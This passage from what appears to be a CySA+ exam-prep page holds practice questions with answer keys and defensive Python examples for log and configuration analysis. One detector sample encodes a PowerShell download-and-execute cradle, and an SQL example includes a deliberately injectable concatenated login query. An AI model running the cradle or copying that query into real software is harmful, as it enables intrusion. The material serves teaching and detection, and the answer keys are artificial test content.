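    if {"download-cradle", "in-memory-exec"} <= set(hits):
        verdict = "isolate"
    elif hits or decoded is not None:
        verdict = "review"
    else:
        verdict = "benign"
    return {"decoded": decoded, "indicators": hits, "verdict": verdict}


def _enc(script):
    """Build an -EncodedCommand argument the way an attacker (or an admin) would."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed EDR command-line telemetry, not captured data.
SAMPLES = {
    "cradle": "powershell.exe -nop -w hidden -enc "
              + _enc("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.77/stage2.ps1')"),
    "admin": "powershell.exe -EncodedCommand " + _enc("Get-Service | Where-Object Status -eq 'Running'"),
    "plain": r"powershell.exe -File C:\scripts\backup.ps1",
}


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        r = analyze(cmd)
        print(f"{name}: {r['verdict']} {r['indicators']}")
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

The first sample decodes to a classic download-and-execute cradle launched with hidden-window and no-profile switches and is marked for isolation; the second decodes to an ordinary service query and is only queued for review; the third has nothing encoded and no indicators. The regex for the flag is built from every prefix of "encodedcommand" so that -e, -ec and -enc are all caught, while -ExecutionPolicy is not misread as an encoded payload.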
Question 12
A cybersecurity team discovers that a threat actor gained access to the organization’s email accounts through credential stuffing attacks. Logs show thousands of successful logins originating from automated scripts. Which security enhancement would MOST effectively prevent this type of attack in the future?
A) Enforce multi-factor authentication for all user accounts
B) Implement password expiration policies
C) Configure full-disk encryption on email servers
D) Block all foreign IP ranges completely
Answer: A
Explanation:
Credential stuffing attacks rely on the reuse of usernames and passwords that originate from previously leaked or breached databases. Attackers automate login attempts across multiple platforms using massive credential lists. Once a reused password is found, authentication succeeds without any exploit. In this scenario, numerous successful logins were achieved by automated scripts, meaning the attacker leveraged exposed credentials.
A enabling multi-factor authentication (MFA) is the most effective mitigation because MFA requires at least one additional authentication factor besides the password. Even if attackers possess valid credentials, they cannot complete the login without something they lack, such as a hardware token, one-time code, or mobile push approval. This counters credential stuffing directly: the attacker's automation only has username and password pairs, so the second challenge stops it regardless of how many of those pairs are valid. Factor strength still matters against other attacks (phishing-resistant methods such as FIDO2 authenticators withstand the credential-phishing and push-fatigue tactics that SMS codes and simple push prompts do not), but any second factor defeats the automated replay of leaked passwords.
B password expiration policies may encourage users to rotate passwords periodically, but they do not prevent credential stuffing, because users often create predictable variations or reuse passwords across services. Modern guidance (for example NIST SP 800-63B) discourages frequent forced changes because they lead to weaker password hygiene.
C enabling full-disk encryption protects data at rest but has no relevance to authentication attacks. Encryption secures stored data, not login attempts coming through email access portals or cloud platforms.
D blocking foreign IP ranges can reduce some malicious traffic but is not an effective primary defense. Many threat actors use VPNs, compromised domestic servers, or cloud-based proxies, making geolocation filtering unreliable. It may also inadvertently block legitimate users traveling abroad.
CySA+ candidates must understand attack patterns, authentication controls, and mitigation strategies. Credential stuffing belongs to the category of password-based attacks. It is often accompanied by bot-driven request spikes, anomalous login times, and geographically dispersed authentication attempts. Analysts must correlate identity management logs, cloud IAM data, and SIEM alerts to identify abnormal authentication events.
After an incident, security teams should reset the passwords of the accounts that were accessed, enable login attempt throttling, screen new passwords against lists of known-breached passwords, and use anomaly-based detection such as impossible-travel logic. Implementing MFA, however, remains the most powerful and widely recommended countermeasure. MFA ensures that compromised credentials alone cannot grant access, sharply reducing the success rate of automated credential attacks. This enhancement is fundamental to enterprise security architecture and is repeatedly highlighted across the CySA+ exam objectives.
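The following added example (not from the original page) serves this question and Question 1: it parses a constructed authentication log and, per source address, distinguishes the three credential-attack patterns the two explanations describe. Brute force is many failures against one or two accounts; password spraying is one or two tries against each of many accounts, mostly failing; credential stuffing is many accounts with an unusually high success rate, because the attacker is replaying pairs that were valid somewhere else. The log format, the addresses (RFC 5737 ranges), the 20-attempt floor, and the rate thresholds are all assumptions for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed line format: "<ISO timestamp> src=<ip> user=<name> result=SUCCESS|FAIL".
LINE_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>SUCCESS|FAIL)$")


def _constructed_log():
    """Sample authentication log built for this example; addresses are RFC 5737 test ranges."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    lines = []
    for i in range(30):        # one account hammered every 2 s: brute force
        lines.append(f"{(base + timedelta(seconds=2 * i)).isoformat()} src=203.0.113.5 user=admin result=FAIL")
    for i in range(40):        # one try per account across many accounts: password spraying
        lines.append(f"{(base + timedelta(seconds=5 * i)).isoformat()} src=198.51.100.7 user=user{i:02d} result=FAIL")
    for i in range(50):        # leaked pairs replayed, 2 in 5 still valid: credential stuffing
        result = "SUCCESS" if i % 5 < 2 else "FAIL"
        lines.append(f"{(base + timedelta(seconds=3 * i)).isoformat()} src=192.0.2.33 user=emp{i:02d} result={result}")
    lines += [                 # an employee mistyping twice, then succeeding: benign
        f"{(base + timedelta(minutes=1)).isoformat()} src=10.0.0.5 user=alice result=FAIL",
        f"{(base + timedelta(minutes=1, seconds=8)).isoformat()} src=10.0.0.5 user=alice result=FAIL",
        f"{(base + timedelta(minutes=1, seconds=20)).isoformat()} src=10.0.0.5 user=alice result=SUCCESS",
    ]
    return lines


LOG_LINES = _constructed_log()


def parse(lines):
    """Keep only lines matching the expected format; return (time, src, user, success) sorted by time."""
    events = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["src"], m["user"], m["result"] == "SUCCESS"))
    return sorted(events)


def peak_in_window(times, window=timedelta(seconds=60)):
    """Most attempts from one source inside any sliding window (two-pointer sweep over sorted times)."""
    best = start = 0
    for i, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, i - start + 1)
    return best


RESPONSE = {
    "brute-force": "block source; confirm no attempt succeeded; alert the targeted account's owner",
    "password-spraying": "block source; per-account lockout will not fire, so alert on failures across accounts",
    "credential-stuffing": "block source; reset every account with a SUCCESS; require MFA",
    "suspicious": "review manually",
}


def classify(events, min_attempts=20):
    """Per source address, decide which credential attack the attempt pattern resembles.
    Thresholds are assumptions for the example and should be tuned to the environment."""
    per_src = defaultdict(list)
    for ev in events:
        per_src[ev[1]].append(ev)
    verdicts = {}
    for src, evs in per_src.items():
        n = len(evs)
        if n < min_attempts:
            continue
        users = {e[2] for e in evs}
        successes = sum(1 for e in evs if e[3])
        success_rate = successes / n
        if len(users) <= 2 and success_rate < 0.1:
            kind = "brute-force"          # few accounts, nearly all failures
        elif success_rate >= 0.2:
            kind = "credential-stuffing"  # guesses are known-valid pairs, so many succeed
        elif len(users) >= 0.8 * n:
            kind = "password-spraying"    # almost every attempt targets a different account
        else:
            kind = "suspicious"
        verdicts[src] = {
            "kind": kind, "attempts": n, "distinct_users": len(users), "successes": successes,
            "peak_per_minute": peak_in_window([e[0] for e in evs]), "response": RESPONSE[kind],
        }
    return verdicts


if __name__ == "__main__":
    for src, v in classify(parse(LOG_LINES)).items():
        print(f"{src}: {v['kind']} ({v['attempts']} attempts, {v['distinct_users']} users, "
              f"{v['successes']} successes, peak {v['peak_per_minute']}/min) -> {v['response']}")
```

The order of the checks matters: credential stuffing is tested before spraying because both involve many distinct accounts, and it is the success rate that separates them. The recommended responses differ accordingly; for stuffing, blocking the source is not enough, because the 20 accounts that returned SUCCESS are already compromised.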
Question 13
While reviewing web server logs, an analyst identifies repeated SQL injection attempts targeting a legacy application. The queries include unusual characters, concatenated strings, and attempts to bypass authentication mechanisms. Which action should the analyst recommend FIRST?
A) Implement web application firewall rules to block malicious queries
B) Rewrite the entire application in a new programming language
C) Block all HTTP traffic until developers fix the code
D) Disable database backups temporarily
Answer: A
Explanation:
SQL injection is one of the most dangerous and widespread web application vulnerabilities. When an analyst notices hostile SQL queries in server logs—such as union-based attempts, Boolean injections, time-based delays, or authentication bypass payloads—it indicates automated scanners or active attackers probing for weaknesses.
A implementing web application firewall (WAF) rules is the correct first step because a WAF can detect and block malicious queries immediately. This provides crucial short-term protection while developers work on long-term fixes. Modern WAFs analyze query patterns, identify suspicious payloads, and enforce filtering policies to prevent unsafe inputs from reaching the application. This approach minimizes business disruption and enhances defense-in-depth.
B rewriting the entire application is unrealistic and unnecessary as an immediate action. While legacy applications may indeed require modernization, rewriting the entire platform is a months-long initiative and cannot be performed during an active attack.
C blocking all HTTP traffic would shut down the service completely, causing severe business impact and violating availability requirements. This is too drastic, especially when defense mechanisms like WAFs can block malicious requests selectively.
D disabling database backups is dangerous and counterproductive; backups are crucial for recovery in the event of data corruption or exploitation. They must remain intact and accessible.
CySA+ candidates must understand how to rapidly mitigate web-based attacks, while recognizing that remediation must follow a structured approach. SQL injection originates from unvalidated input fields, such as login forms or search bars. Attackers exploit these weaknesses to retrieve data, modify tables, escalate privileges, or manipulate database logic. Analysts reviewing log data often observe patterns such as suspicious symbols, encoded payloads, or verbose error messages.
Recommended steps include applying WAF filters, enabling input validation, sanitizing queries through parameterized statements, and performing regular vulnerability scans. Long-term remediation should involve reviewing application code, updating outdated libraries, and conducting penetration testing to ensure compliance with secure coding standards. Mitigation frameworks such as OWASP guidelines are particularly relevant for exam preparation and real-world implementation.
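As an added illustration of the parameterized-statement fix recommended above (example code written for this page, not from any application the question describes), the concatenated query of a legacy login beside its parameterized form; the users table, the account alice / correct-horse and the helper names are constructed for the example.

```python
import hashlib
import sqlite3


def legacy_hash(password: str) -> str:
    """Unsalted SHA-256 hex: a legacy scheme kept here so the example stays on
    the query; a real remediation would also move to a salted, slow KDF."""
    return hashlib.sha256(password.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """In-memory users table with one constructed account (alice / correct-horse)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("alice", legacy_hash("correct-horse")))
    return db


def login_vulnerable(db: sqlite3.Connection, username: str, password: str):
    """The legacy pattern behind the question: request input is concatenated
    into the SQL text, so any quote or SQL syntax in it becomes part of the
    statement instead of being compared as a value."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND pw_hash = '{legacy_hash(password)}'")
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_parameterized(db: sqlite3.Connection, username: str, password: str):
    """Hardened form: placeholders send the input to SQLite as bound data, so
    the database never parses it as SQL regardless of its contents."""
    sql = "SELECT username FROM users WHERE username = ? AND pw_hash = ?"
    row = db.execute(sql, (username, legacy_hash(password))).fetchone()
    return row[0] if row else None


def try_login(login_fn, db: sqlite3.Connection, username: str, password: str):
    """What the web tier observes: ('ok', user), ('denied', None) or
    ('error', message). The error path is the verbose-message artefact that
    shows up in server logs when a quote breaks a concatenated query."""
    try:
        user = login_fn(db, username, password)
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("ok", user) if user else ("denied", None)


if __name__ == "__main__":
    db = make_db()
    # A name with an apostrophe is enough to break the concatenated statement.
    print(try_login(login_vulnerable, db, "O'Brien", "guess"))           # ('error', ...)
    print(try_login(login_parameterized, db, "O'Brien", "guess"))        # ('denied', None)
    print(try_login(login_parameterized, db, "alice", "correct-horse"))  # ('ok', 'alice')
```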
Question 14
A threat intelligence team observes that a newly discovered malware variant is using domain generation algorithms (DGAs) to evade detection and frequently change its command-and-control hosts. What is the MOST effective way to defend against this type of threat?
A) Deploy DNS filtering with machine learning–based anomaly detection
B) Disable all outbound DNS queries from the network
C) Create static firewall rules to block each domain manually
D) Block all encrypted traffic across the organization
Answer: A
Explanation:
Malware that uses domain generation algorithms (DGAs) is particularly difficult to track and block. DGAs rapidly produce large numbers of pseudo-random domain names that serve as potential command-and-control servers. Because these domains change frequently, traditional blacklist-based filtering becomes ineffective.
A DNS filtering enhanced with anomaly detection is the most effective defense because it relies on behavioral patterns rather than static domain lists. Machine learning techniques can evaluate characteristics of domain queries—such as entropy, length patterns, randomness, and frequency—and identify DGA-based traffic with high accuracy. This allows security teams to detect and block connections to suspicious domains before malware successfully establishes communication.
B disabling all outbound DNS queries is impractical, as it would completely break internet functionality for the organization. DNS is fundamental for navigation and communication, so this is not a viable strategy.
C creating static firewall rules for each malicious domain is ineffective because DGAs generate thousands of constantly changing hostnames. Maintaining such a list manually is impractical and insufficient.
D blocking all encrypted traffic is dangerous and unrealistic. Legitimate services rely on encryption for secure communication. Blocking all encrypted traffic would devastate business operations and violate cybersecurity best practices.
CySA+ candidates must understand the evolution of malware evasion techniques, including DGAs, fast-flux DNS, and encrypted C2 channels. DGA detection requires analyzing DNS patterns, integrating SIEM correlation, and using threat-intelligence feeds that provide insights on suspicious domain activity. DNS-layer security solutions help organizations identify malicious behavior long before payloads execute or data exfiltration occurs.
The analyst should also review internal logs, investigate infected endpoints, and quarantine compromised systems. Network segmentation and strict egress filtering further reduce the impact of DGA-enabled malware. By implementing intelligent DNS controls, organizations strengthen their ability to counter modern threats that rely on rapid domain rotation to circumvent traditional defenses.
Question 15
A security operations team detects anomalous SMB traffic between multiple internal hosts, including file transfers occurring outside business hours. Further investigation reveals signs of brute-force attempts and lateral movement. Which of the following should the analyst prioritize to stop the spread of the attack?
A) Disable compromised accounts and initiate network segmentation
B) Perform system-wide firmware updates immediately
C) Shut down the file server permanently
D) Reinstall the operating systems on all hosts
Answer: A
Explanation:
Anomalous SMB traffic involving unexpected file transfers outside normal operational hours is a strong indicator of lateral movement. When brute-force attempts accompany this activity, the threat is likely exploiting weak credentials or stolen hashes to move deeper into the network. The top priority must be preventing additional systems from being compromised.
A disabling affected accounts and implementing network segmentation is the correct response because it directly stops lateral movement. Disabling accounts used by the attacker cuts off access, while segmentation limits the propagation path by isolating hosts and restricting inter-host communication. This approach aligns with incident response best practices by containing the threat before performing more resource-intensive remediation.
B firmware updates are irrelevant at this stage. While updating firmware is a good long-term security measure, it does not address ongoing lateral movement or brute-force authentication attempts.
C shutting down the file server permanently is unnecessary, harmful, and disruptive. The server may be a target, but immediate shutdown without analysis could lead to data loss and operational downtime.
D reinstalling operating systems on all hosts is a drastic step appropriate only after containment and full forensic evaluation. This should never be the first priority because evidence would be destroyed prematurely.
CySA+ professionals must be skilled in detecting lateral movement techniques such as credential reuse, SMB exploitation, remote execution, and privilege escalation. Logs revealing unusual SMB file transfers, authentication spikes, or inter-host communication patterns are key indicators. Analysts should identify compromised accounts through SIEM correlation, EDR telemetry, Kerberos anomalies, and brute-force alerting tools.
Once isolation and account disabling occur, further steps include checking password policies, enforcing MFA, scanning for persistence mechanisms, and reviewing administrative privileges. Network segmentation enhances security by dividing the network into zones and reducing the blast radius of attacks. Combining segmentation with enhanced identity management, endpoint containment, and log analysis forms a holistic mitigation strategy aligned with CySA+ methodologies and incident response frameworks.
Question 16
During an investigation, a cybersecurity analyst identifies that several internal systems are communicating with an external IP using uncommon ports and generating encrypted traffic that is not associated with any approved business application. The analyst suspects that an attacker has installed a covert tunneling tool. What should the analyst do FIRST to validate this suspicion?
A) Review packet captures to analyze traffic behavior and patterns
B) Immediately block all communication to the external IP
C) Reset user credentials for all employees
D) Disable encryption protocols across the enterprise
Answer: A
Explanation:
When unusual outbound communication occurs on nonstandard ports combined with encrypted traffic, it often indicates the presence of covert tunneling tools, such as reverse shells, data exfiltration utilities, or encrypted command-and-control channels. These types of attack strategies are widely used in modern intrusion campaigns to evade traditional detection mechanisms by hiding malicious activity within encrypted streams. The first and most critical step is to review packet captures through deep packet inspection.
A analyzing packet captures is the correct initial action because it enables the analyst to examine metadata, communication patterns, timing intervals, payload sizes, protocol anomalies, and domain or IP behavior. While the traffic itself may be encrypted, the metadata still provides substantial clues, such as beaconing behavior, abnormal keep-alive intervals, TLS handshake irregularities, and suspicious certificate attributes. Packet captures also expose whether tunneling frameworks such as SSH tunnels, DNS tunnels, or custom TCP wrappers are being leveraged.
B blocking communication to the external IP may be necessary later, but prematurely doing so can impede the investigation and alert the attacker. It also prevents analysts from fully observing the adversary’s behavior, which is crucial for understanding the extent of compromise.
C resetting user credentials is a standard remediation step for identity-related compromise but does not directly validate the presence of covert tunneling. Without confirming the root cause, resetting passwords prematurely may only slightly impact the attacker if persistence mechanisms or unauthorized services remain active.
D disabling encryption protocols is highly destructive and would shut down legitimate secure communications across the entire organization. This action would cause severe operational chaos and violate best practices.
CySA+ candidates must deeply understand advanced attacker tactics involving covert channels. These methods often exploit unused ports, protocol similarity, or legitimate encryption to hide data exfiltration activity. Analysts should evaluate NetFlow data, check for mismatched ports, identify unusual connection durations, review host process trees, and investigate anomalies in TLS certificate fingerprints.
Packet captures are essential for confirming tunneling behavior because they expose structural inconsistencies such as payload size uniformity, malformed packets, repeated beacon intervals, or encrypted sessions originating from unexpected services. After validation, analysts can escalate to containment, isolation of endpoints, blocking command-and-control channels, and digging deeper into system artifacts to uncover persistence mechanisms. A systematic, evidence-driven approach ensures accuracy and aligns with CySA+ incident response frameworks.
Question 17
A company experiences repeated brute-force attempts targeting its public-facing SSH server. Authentication logs show thousands of login failures from distributed IP addresses originating from multiple countries. Which of the following actions would MOST effectively reduce these attacks while maintaining secure remote access for administrators?
A) Enforce key-based SSH authentication and disable password logins
B) Block all international IP addresses permanently
C) Reassign the SSH port to a random high-numbered port
D) Disable SSH access entirely and rely on physical access only
Answer: A
Explanation:
SSH brute-force attacks are extremely common due to automated botnets scanning the internet for exposed SSH services. These attacks rely on password guessing using massive dictionaries and credential reuse. The most effective mitigation is to remove passwords from the authentication process and enforce key-based authentication.
A enforcing key-based SSH authentication and disabling password authentication is the strongest defense because SSH keys are cryptographically strong and far more resistant to brute-force attempts than passwords. Private keys cannot be guessed through conventional dictionary attacks because the key space is vastly larger than any password list. This approach also aligns with best practices in server hardening and remote administration.
B blocking all international IPs is not effective because threat actors frequently use proxies, VPNs, and compromised domestic systems to conduct brute-force attacks. Geolocation filtering may reduce some noise but is insufficient as a standalone security measure.
C changing the SSH port provides only minimal security. While it may reduce low-effort automated scans, determined attackers use full-range port scanning and will still identify the exposed service. This is considered security by obscurity and does not fundamentally solve the issue.
D disabling SSH entirely is impractical, especially for organizations that require remote system administration. For many companies, SSH is essential for server management, automation, and DevOps workflows.
CySA+ candidates must understand identity-focused attacks, including brute-force attempts and credential stuffing. They should also be familiar with mitigation techniques such as fail2ban, rate limiting, MFA for SSH, firewall rules, VPN tunnels, bastion hosts, and hardened key-based authentication. SSH logs often display repeated authentication failures, password-guessing tools, timing patterns, and unusual geographic sources.
Key-based authentication represents a robust, scalable, and secure method that significantly mitigates brute-force risks while maintaining operational efficiency. Its adoption is widely recommended across cybersecurity frameworks, and it reflects the core defensive principles evaluated on the CySA+ exam.
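To show what "enforce key-based authentication and disable password logins" looks like in sshd_config, and how an analyst can verify it, an added example that is not from any real host or project: the config fragments are constructed, the MaxAuthTries ceiling is an assumed policy, and the parser follows OpenSSH's first-occurrence-wins rule for keywords.

```python
import re

# Constructed sshd_config fragments (not taken from any real host). The first is
# the state the question describes; the second enforces key-only logins.
WEAK_SSHD_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
PubkeyAuthentication yes
"""

HARDENED_SSHD_CONFIG = """\
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PasswordAuthentication no
# PAM's keyboard-interactive path can still prompt for a password; close it too.
KbdInteractiveAuthentication no
ChallengeResponseAuthentication no
PermitEmptyPasswords no
MaxAuthTries 3
"""

# Values OpenSSH applies when a keyword is absent (sshd_config(5) defaults).
DEFAULTS = {
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "permitrootlogin": "prohibit-password",
    "permitemptypasswords": "no",
    "maxauthtries": "6",
}


def parse_sshd_config(text: str) -> dict:
    """{keyword: value} using sshd's own rules: keywords are case-insensitive,
    the FIRST occurrence of a keyword wins, and 'Key=value' is accepted.
    Parsing stops at the first Match block because those values are conditional."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) != 2:
            continue
        key, value = parts[0].lower(), parts[1].strip()
        if key == "match":
            break
        if key == "challengeresponseauthentication":  # deprecated alias
            key = "kbdinteractiveauthentication"
        cfg.setdefault(key, value)
    return cfg


def effective(cfg: dict, key: str) -> str:
    """Configured value, or the OpenSSH default when the keyword is absent."""
    return cfg.get(key, DEFAULTS.get(key, "")).lower()


def audit_sshd_config(text: str, max_auth_tries: int = 3) -> list:
    """Findings for the controls behind answer A; an empty list means password
    logins are off and key-based authentication is on. max_auth_tries is an
    assumed policy ceiling, not an OpenSSH requirement."""
    cfg = parse_sshd_config(text)
    findings = []
    if effective(cfg, "pubkeyauthentication") != "yes":
        findings.append("PubkeyAuthentication must be yes")
    if effective(cfg, "passwordauthentication") != "no":
        findings.append("PasswordAuthentication should be no")
    if effective(cfg, "kbdinteractiveauthentication") != "no":
        findings.append("KbdInteractiveAuthentication should be no (PAM can still prompt for passwords)")
    if effective(cfg, "permitrootlogin") == "yes":
        findings.append("PermitRootLogin yes; prefer prohibit-password or no")
    if effective(cfg, "permitemptypasswords") != "no":
        findings.append("PermitEmptyPasswords must be no")
    if int(effective(cfg, "maxauthtries")) > max_auth_tries:
        findings.append(f"MaxAuthTries exceeds {max_auth_tries}")
    return findings
```

Note that the weak fragment never mentions KbdInteractiveAuthentication, yet the audit still flags it: the absent keyword falls back to OpenSSH's default of yes, which is exactly the gap that leaves a password prompt open after PasswordAuthentication is switched off.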
Question 18
A security analyst discovers that multiple endpoints are infected with malware delivered through a phishing email containing a malicious macro embedded in a document. The malware establishes persistence through registry modifications and scheduled tasks. What should the analyst prioritize FIRST during remediation?
A) Contain infected hosts to prevent additional spread
B) Delete the phishing email from all employee inboxes
C) Disable all scheduled tasks across the network
D) Perform company-wide security awareness training immediately
Answer: A
Explanation:
Phishing emails delivering macro-based malware are a widespread attack vector, and infections that leverage registry changes and scheduled tasks indicate persistence mechanisms designed to ensure continuous execution. The highest priority in any incident involving active malware is containment.
A containing infected hosts is the correct initial step because it prevents the malware from spreading to additional systems, communicating with command-and-control servers, or exfiltrating more data. Containment typically includes isolating hosts via network controls, restricting outbound connections, and identifying impacted systems through endpoint telemetry.
B deleting the phishing email from inboxes is important but not the first priority. Removing the email does not help already infected systems and may hinder forensic analysis if the original source is deleted prematurely.
C disabling scheduled tasks across the entire enterprise is a dangerous overreaction. This would disrupt legitimate scheduled operations such as backups, system patches, automated processes, and monitoring tasks.
D company-wide training is a long-term measure, not an immediate remediation step during an active infection. Although awareness training is critical, it cannot mitigate an ongoing attack.
CySA+ exam objectives require analysts to respond systematically to malware outbreaks, understanding persistence strategies such as registry Run keys, cron jobs, scheduled tasks, startup folders, WMI persistence, and unauthorized services. Analysts should first contain the threat, then move to identify indicators of compromise, remove malicious artifacts, investigate how the macro executed, and patch any vulnerabilities enabling the compromise.
This structured approach aligns with incident response phases: preparation, identification, containment, eradication, recovery, and lessons learned. Containment is essential because it stops the attacker’s foothold from expanding, protects additional hosts, and preserves evidence required for deeper analysis.
Question 19
A cybersecurity analyst detects anomalous outbound DNS queries originating from a single endpoint. The queries follow a consistent pattern of long, random-looking subdomains. The analyst suspects that the system may be communicating with a DNS-based command-and-control channel. Which action should the analyst take FIRST?
A) Isolate the affected endpoint and investigate DNS logs
B) Flush the DNS cache on all enterprise systems
C) Disable DNS across the network
D) Restart the affected endpoint to terminate the process
Answer: A
Explanation:
Long, pseudo-random subdomain queries are a common sign of DNS tunneling, where attackers encode data within DNS requests to bypass firewalls and exfiltrate information or communicate with command-and-control servers. When an endpoint exhibits these behaviors, immediate containment is crucial to prevent further data leakage or malicious communication.
A isolating the endpoint and investigating DNS logs is the correct first step. Containment prevents additional outbound communication, while DNS log analysis allows the analyst to confirm tunneling behavior, identify encoded payloads, review query destinations, and detect patterns indicative of malware.
B flushing DNS caches enterprise-wide is ineffective because the issue is with an active malicious process, not cached addresses. This action would not stop ongoing exfiltration.
C disabling DNS altogether would cripple network operations, preventing users from accessing websites, cloud applications, and internal resources. It is an extreme and inappropriate reaction.
D restarting the endpoint may temporarily stop the malicious process but risks destroying volatile evidence such as memory-resident malware, encoded payloads, and active sessions. It also allows the malware to execute its persistence mechanisms upon reboot.
CySA+ analysts must recognize indicators of DNS-based attacks, such as unusually high query frequency, uniform query size, non-human domains, DGA patterns, and encrypted data fragments within DNS payloads. Analysts should correlate SIEM alerts, endpoint logs, and network telemetry to confirm the compromise.
After containment, they should analyze system artifacts, inspect memory dumps, examine scheduled tasks, review running processes, and identify any unauthorized services. DNS tunneling is complex and often part of more advanced infiltration strategies, necessitating careful investigation and proper evidence preservation.
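The DNS indicators named in Questions 14 and 19 (entropy, length and NXDOMAIN churn for DGAs; long subdomains repeatedly sent to one base name for tunneling) computed over sample resolver log lines, as one added example covering both questions; the log, client addresses, domain names and thresholds are constructed for illustration and are not from the original page.

```python
import math
from collections import Counter, defaultdict

# Constructed resolver log (not real data): "epoch client qname rcode". 10.0.0.5 is
# normal, 10.0.0.7 shows the DGA churn of Question 14 (many random, unresolvable
# names), 10.0.0.9 the long encoded subdomains under one base name of Question 19.
SAMPLE_LOG = """\
1700000000 10.0.0.5 www.example.com NOERROR
1700000002 10.0.0.7 kq3v9zt1xp8w.net NXDOMAIN
1700000002 10.0.0.7 a7f2c0bd91qz.com NXDOMAIN
1700000003 10.0.0.7 zz81mvq0prt4.org NXDOMAIN
1700000004 10.0.0.7 login.example.com NOERROR
1700000005 10.0.0.9 4d7a6c2f8e1b9a0c3d5e7f2a1b4c6d8e.tun.example-evil.test NOERROR
1700000005 10.0.0.9 9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b.tun.example-evil.test NOERROR
1700000006 10.0.0.9 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d.tun.example-evil.test NOERROR
"""

# Illustrative thresholds (assumptions); tune them against your own baseline.
DGA_MIN_ENTROPY, DGA_MIN_NXDOMAIN, DGA_MIN_DISTINCT = 3.0, 0.5, 3
TUNNEL_MIN_SUBLEN, TUNNEL_MIN_PER_BASE = 30, 3

def shannon_entropy(s: str) -> float:
    """Bits per character; a 12-char label with no repeats scores log2(12) = 3.58."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0

def split_name(qname: str):
    """(registrable base, subdomain part). Base = last two labels, an assumption
    made because no public-suffix list is available offline."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])

def parse_log(text: str) -> list:
    return [tuple(line.split()) for line in text.splitlines() if line.strip()]

def profile_clients(records) -> dict:
    """Per-client features matching the page's indicators: entropy, length, failure ratio, concentration."""
    by_client = defaultdict(list)
    for rec in records:
        by_client[rec[1]].append(rec)
    profiles = {}
    for client, recs in by_client.items():
        bases, entropies, sub_lens, nx = Counter(), [], [], 0
        for _, _, qname, rcode in recs:
            base, sub = split_name(qname)
            bases[base] += 1
            entropies.append(shannon_entropy(base.split(".")[0]))
            if sub:
                sub_lens.append(len(sub))
            nx += rcode == "NXDOMAIN"
        profiles[client] = {
            "nxdomain_ratio": nx / len(recs),
            "mean_sld_entropy": sum(entropies) / len(entropies),
            "distinct_bases": len(bases),
            "max_queries_per_base": max(bases.values()),
            "mean_sub_len": sum(sub_lens) / len(sub_lens) if sub_lens else 0.0,
        }
    return profiles

def classify(p: dict) -> list:
    """DGA: many unresolvable, high-entropy, distinct names. Tunnel: long subdomains hitting one base."""
    flags = []
    if (p["nxdomain_ratio"] >= DGA_MIN_NXDOMAIN and p["distinct_bases"] >= DGA_MIN_DISTINCT
            and p["mean_sld_entropy"] >= DGA_MIN_ENTROPY):
        flags.append("possible-DGA")
    if p["max_queries_per_base"] >= TUNNEL_MIN_PER_BASE and p["mean_sub_len"] >= TUNNEL_MIN_SUBLEN:
        flags.append("possible-DNS-tunnel")
    return flags

def find_suspicious(log_text: str) -> dict:
    """client -> flags, for clients with something to report."""
    return {c: f for c, p in profile_clients(parse_log(log_text)).items() if (f := classify(p))}
```

Over the sample, 10.0.0.7 is flagged for DGA behaviour and 10.0.0.9 for tunneling while the ordinary client produces no flags; on real traffic the timestamps also support a query-rate feature, which this block leaves out.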
Question 20
An organization notices that multiple user accounts are generating successful logins from geographically impossible locations within minutes. The analyst suspects the use of stolen credentials. Which security control would MOST effectively prevent this type of attack?
A) Implement conditional access policies with impossible-travel detection
B) Increase minimum password length
C) Require password resets every 60 days
D) Disable all remote access capabilities
Answer: A
Explanation:
Logins from geographically impossible locations are a hallmark of credential compromise. Attackers often use cloud-based proxies, botnets, or compromised accounts to authenticate from distant regions in short intervals. The most effective countermeasure is to implement conditional access policies that evaluate the risk level of authentication attempts.
A impossible-travel detection automatically identifies when a login occurs from two different geographic regions within a time frame that is physically impossible. These systems use identity analytics, behavioral baselines, and machine learning to determine whether access attempts are legitimate. When anomalies are detected, access is denied or additional authentication challenges are required.
B increasing password length is beneficial but does not hinder attackers who already possess valid credentials.
C requiring password resets every 60 days is outdated and does not address real-time credential misuse.
D disabling remote access is unrealistic and would severely disrupt operations.
CySA+ candidates must understand identity protection mechanisms such as behavioral analytics, conditional access, impossible-travel logic, and risk-based authentication. These advanced controls evaluate context, device posture, location, and user behavior to detect anomalies indicative of credential misuse.
Impossible-travel detection is widely used in cloud identity platforms, helping to identify compromised accounts quickly and stopping attackers before lateral movement or privilege escalation can occur. This mirrors real-world practices and aligns directly with CySA+ exam objectives.
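Impossible-travel logic as an added worked example (not code from any identity platform): consecutive sign-ins for the same user are compared using great-circle distance and elapsed time, and the required speed decides between step-up authentication and a deny; the sign-in events, speed ceiling and deny multiplier are assumptions made for illustration.

```python
import math
from datetime import datetime, timezone
from typing import NamedTuple

# Assumed policy (not from the page): faster than a commercial flight is
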